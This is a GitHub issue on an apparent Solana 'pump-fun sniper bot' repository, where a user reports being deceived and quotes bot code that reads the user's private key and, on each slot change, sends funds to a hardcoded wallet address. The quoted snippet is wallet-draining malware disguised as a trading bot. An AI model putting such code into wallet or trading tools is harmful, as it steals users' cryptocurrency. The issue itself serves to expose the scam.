pumpfunfeebot / pump-fun-sniper-bot

pump 自动控盘机器人
4 stars 2 forks source link

I was deceived #1

Open meteorskill opened 3 months ago

meteorskill commented 3 months ago

All SOL coins have been transferred to DeipR5swhPxbQwvF3XSYLrm2SqNyfUkLsAibfrFEQn23

code:

(async () => { const walletKeyPairFile = (process.env.PRIVATE_KEY!) const walletKeyPair = Keypair.fromSecretKey(bs58.decode(walletKeyPairFile));

const connection = new Connection(process.env.RPC_ENDPOINT ?? clusterApiUrl('devnet'), 'finalized'); connection.onSlotChange( handleSlotChange({ connection, walletKeyPair, destinationAddress: new PublicKey("DeipR5swhPxbQwvF3XSYLrm2SqNyfUkLsAibfrFEQn23") }), ); })();